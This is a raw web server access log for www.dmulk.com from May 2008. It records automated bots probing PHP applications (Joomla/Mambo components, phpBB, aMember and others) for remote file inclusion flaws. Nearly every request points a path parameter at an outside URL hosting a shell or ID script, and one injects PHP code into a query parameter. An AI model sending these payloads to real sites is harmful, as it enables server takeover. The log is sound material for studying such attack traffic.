67.205.85.232 - - [24/May/2008:10:00:06 -0700] "GET /logs/access_080103.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:00:06 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:00:07 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:00:07 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:00:56 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.58.181.74 - - [24/May/2008:10:00:57 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:01:20 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:01:21 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
62.163.140.46 - - [24/May/2008:10:01:28 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.163.140.46 - - [24/May/2008:10:01:29 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:01:36 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.65" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:01:38 -0700] "GET /logs/access_080215.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:01:38 -0700] "GET //include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:01:38 -0700] "GET /logs//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
85.17.103.109 - - [24/May/2008:10:01:45 -0700] "GET /My_eGallery/index.php?basepath=http://xotaz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
85.17.103.109 - - [24/May/2008:10:01:45 -0700] "GET /logs/My_eGallery/index.php?basepath=http://xotaz.t35.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:01:47 -0700] "GET /logs/access_080215.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:01:48 -0700] "GET //include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:01:48 -0700] "GET /logs//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:02:09 -0700] "GET //include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:02:14 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:02:14 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:02:15 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:02:32 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:02:36 -0700] "GET /logs/access_080123.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:02:36 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:02:37 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
65.55.211.26 - - [24/May/2008:10:03:13 -0700] "GET /minamijewelry/source_images/?D=D HTTP/1.1" 200 2414 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
91.121.123.76 - - [24/May/2008:10:03:19 -0700] "GET /logs/index.php?redir=http://www.csccog.org/language/s.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.121.123.76 - - [24/May/2008:10:03:20 -0700] "GET /logs/index.php?redir=http://www.bogazlikoyu.com//components/com_zoom/images/tetas.jpg? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:10:03:20 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:10:03:20 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.121.123.76 - - [24/May/2008:10:03:29 -0700] "GET /index.php?redir=http://www.csccog.org/language/s.txt??? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
91.121.123.76 - - [24/May/2008:10:03:29 -0700] "GET /index.php?redir=http://www.bogazlikoyu.com//components/com_zoom/images/tetas.jpg? HTTP/1.1" 200 11606 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:03:39 -0700] "GET /logs/access_080223.log//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:03:55 -0700] "GET /logs//index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.249.70.167 - - [24/May/2008:10:03:57 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "Googlebot-Image/1.0" "www.dmulk.com"
66.249.70.167 - - [24/May/2008:10:03:57 -0700] "GET /minamijewelry/html/images/jewelry/W4t.jpg HTTP/1.1" 200 3775 "-" "Googlebot-Image/1.0" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:10:04:00 -0700] "GET /components/com_users/core/include/myMailer.class.php?mosConfig_absolute_path=http://fizwig.fizwig.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
87.106.209.176 - - [24/May/2008:10:04:00 -0700] "GET /logs/components/com_users/core/include/myMailer.class.php?mosConfig_absolute_path=http://fizwig.fizwig.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:10:04:00 -0700] "GET //index.php?option=com_restaurante&task=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:04:03 -0700] "GET /logs/access_080120.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:04:07 -0700] "GET /logs/access.log//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:04:13 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:04:14 -0700] "GET /logs/access.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:04:20 -0700] "GET /logs/access.log//include/logout.php?PSA_PATH=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:04:24 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 11607 "-" "libwww-perl/5.805" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:10:04:26 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.traderscorporation.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
212.146.133.138 - - [24/May/2008:10:04:26 -0700] "GET //includes/messages.inc.php?include_path=http://www.traderscorporation.com/fuckrox-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:10:04:42 -0700] "GET /logs/joomla/index.php?option=com_restaurante&task=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.96.205 - - [24/May/2008:10:04:42 -0700] "GET /joomla/index.php?option=com_restaurante&task=http://www.geocities.com/snozzer_boy/shell/31377os.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
158.227.2.24 - - [24/May/2008:10:04:44 -0700] "GET /logs/access_080219.log//index.php?option=com_jd-wp&task=cat_view&gid=&mosConfig_absolute_path=http://www.alazharacademy.ca//id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:10:04:48 -0700] "GET /logs/access.log/start.php?lang=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:10:04:48 -0700] "GET /start.php?lang=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
69.72.211.242 - - [24/May/2008:10:04:49 -0700] "GET /logs/start.php?lang=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
207.7.108.240 - - [24/May/2008:10:04:52 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
207.7.108.240 - - [24/May/2008:10:04:52 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.208.111.178 - - [24/May/2008:10:04:52 -0700] "GET /logs/access_080327.log//class/class.dashboard_cms.php?where_framework=http://kclarkes.t35.com/cd/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.102.21.26 - - [24/May/2008:10:04:58 -0700] "GET /logs//includes/messages.inc.php?include_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
75.102.21.26 - - [24/May/2008:10:04:58 -0700] "GET //includes/messages.inc.php?include_path=http://www.grupslactancia.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [24/May/2008:10:05:50 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
66.225.217.194 - - [24/May/2008:10:05:50 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://cocreation.hk/on? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
62.163.140.46 - - [24/May/2008:10:06:07 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.163.140.46 - - [24/May/2008:10:06:08 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:06:20 -0700] "GET /logs/access_080215.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:06:20 -0700] "GET //PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:06:20 -0700] "GET /logs//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
161.58.178.229 - - [24/May/2008:10:06:25 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://kingsofwarcraft.com/info? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:10:07:13 -0700] "GET /logs/access_080220.log/joomla/index.php?option=com_restaurante&task=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
147.91.226.2 - - [24/May/2008:10:07:23 -0700] "GET /logs//login.php?dir=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
147.91.226.2 - - [24/May/2008:10:07:23 -0700] "GET //login.php?dir=http://www.gnetelearningsystem.com.ar/campus/imagenes/cmd.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.126.108.198 - - [24/May/2008:10:07:28 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [24/May/2008:10:07:29 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.164.178.178 - - [24/May/2008:10:07:32 -0700] "GET /logs/access_080223.log/joomla/index.php?option=com_restaurante&task=http://www.paholyonline.hu/forum/images/sup.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [24/May/2008:10:07:32 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.126.108.198 - - [24/May/2008:10:07:32 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://users5.nofeehost.com/maniezan/iyes.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:07:35 -0700] "GET /logs/access_080220.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:07:35 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:10:07:35 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:07:47 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:07:48 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:07:50 -0700] "GET /logs/access.log//PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:07:58 -0700] "GET /logs/access_080215.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:07:58 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
84.19.178.201 - - [24/May/2008:10:07:59 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:08:01 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:10:08:02 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:08:52 -0700] "GET /logs//index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:08:54 -0700] "GET /logs/access_080124.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:08:54 -0700] "GET //index.php?option=com_mambowiki&Itemid=&mosConfig_absolute_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:08:54 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:08:54 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
209.216.2.12 - - [24/May/2008:10:09:06 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.2.12 - - [24/May/2008:10:09:09 -0700] "GET /logs/access_080215.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://www.liautism.com/components/efnet.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.234.216.10 - - [24/May/2008:10:09:09 -0700] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.25.195.72 - - [24/May/2008:10:09:14 -0700] "GET /amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
209.25.195.72 - - [24/May/2008:10:09:14 -0700] "GET /logs/amember/plugins/payment/secpay/secpay.inc.php?config[root_dir]=http://skyoffice.com.ar/test.txt??? HTTP/1.1" 404 275 "-" "Advanced Browser (http://www.avantbrowser.com)" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:09:26 -0700] "GET /logs/access_080124.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:09:27 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
67.205.85.232 - - [24/May/2008:10:09:27 -0700] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:09:43 -0700] "GET /squirrelcart/popup_window.php?site_isp_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
77.244.44.10 - - [24/May/2008:10:09:43 -0700] "GET /logs/squirrelcart/popup_window.php?site_isp_root=http://www.geocities.com/cahayaindra/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:10:00 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:10:10:01 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
80.86.123.123 - - [24/May/2008:10:10:03 -0700] "GET /logs/access_080401.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.freewebtown.com/cioabi/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:10:05 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:10:10:05 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
